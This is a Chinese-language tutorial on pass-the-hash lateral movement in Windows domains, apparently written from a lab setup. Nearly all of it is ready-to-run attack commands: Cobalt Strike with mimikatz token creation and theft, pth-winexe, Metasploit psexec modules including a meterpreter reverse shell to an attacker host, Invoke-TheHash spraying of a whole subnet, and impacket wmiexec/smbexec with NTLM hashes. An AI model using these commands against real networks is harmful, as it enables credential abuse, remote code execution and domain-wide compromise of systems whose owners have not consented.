0x01 簡介
PTH全稱“pass the hash”,即hash傳遞。PTH通過smb服務進行,走445端口。
0x02 通過PTH橫向移動
一、通過cobaltstrike進行PTH
1、在已上線機器中直接dir訪問目標系統C盤,提示沒權限。
beacon> shell dir \192.168.3.123\c$
2、此處使用先前已獲取的hash對目標administrator用戶進行PTH。(大致爲通過mimikatz和目標hash創建一個訪問令牌,此處PID爲392)
beacon> mimikatz sekurlsa::pth /user:administrator /domain:ggyao /ntlm:b4e535a9bb56bcc084602062c9e2a9d4 /run:"cmd -w hidden"
(若爲工作組環境,則命令修改爲/domain:.)
3、通過cobaltstrike內置的steal_token竊取剛剛創建的令牌,竊取成功後,可正常訪問目標系統資源。
beacon> steal_token 392
beacon> shell dir \\192.168.3.123\c$
二、通過kali自帶工具進行pth
1、相關工具如下。
2、獲取拿到權限機器的hash。
3、使用pth-winexe獲取一個cmd。
pth-winexe -U GGYAO/administrator%dc4112fd3aee4d001578da9b8ff96ce3:b4e535a9bb56bcc084602062c9e2a9d4 --system --ostype=1 //192.168.3.123 cmd
三、MSF中hash傳遞模塊的利用
psexec_command模塊(特徵明顯,少用)
1、使用psexec_command模塊進行命令執行。
msf > use auxiliary/admin/smb/psexec_command
msf > set rhosts 192.168.3.123
msf > set smbdomain GGYAO
msf > set smbuser administrator
msf > set smbpass 目標hash
msf > set command whoami
msf > set verbose true
msf > run
此處是用2003的hash成功pth了2008的機器,反之失敗:
psexec_psh模塊(特徵明顯,少用)
msf > use exploit/windows/smb/psexec_psh
msf > set rhost 192.168.3.123
msf > set smbdomain ggyao
msf > set smbuser administrator
msf > set smbpass 目標hash
msf > set payload windows/x64/meterpreter/reverse_tcp_uuid
msf > set lhost 192.168.3.86
msf > set lport 4444
msf > exploit -j -z
此處是用2003的hash成功pth了2008的機器,反之失敗:
四、通過powershell進行批量pth(wmi)
使用已知管理員hash,批量撞指定網段機器,此方式同時適用於工作組和域環境。需要同時加載Invoke-WMIExec.ps1、Invoke-TheHash.ps1。(https://github.com/Kevin-Robertson/Invoke-TheHash)
1、加載腳本。
本地加載(推薦使用)
powershell -exec bypass
Import-Module .\Invoke-WMIExec.ps1
Import-Module .\Invoke-TheHash.ps1
2、利用已有管理員hash,批量撞指定網段機器。
域環境下:
PS C:\Users\Administrator> Invoke-TheHash -Type WMIExec -Target 192.168.3.0/24 -Domain ggyao -Username administrator -Hash e1c61709dffcf154ac9d77b5024f6d10
工作組環境下:
(或者在網段後加選項 -Domain .)
PS C:\Users\Administrator> Invoke-TheHash -Type WMIExec -Target 192.168.3.0/24 -Username administrator -Hash b4e535a9bb56bcc084602062c9e2a9d4
五、通過impacket進行hash傳遞
命令執行
1、wmiexec.exe -hashes :e1c61709dffcf154ac9d77b5024f6d10 ggyao/[email protected] “ipconfig”
反彈shell
1、smbexec.exe -hashes :e1c61709dffcf154ac9d77b5024f6d10 ggyao/[email protected]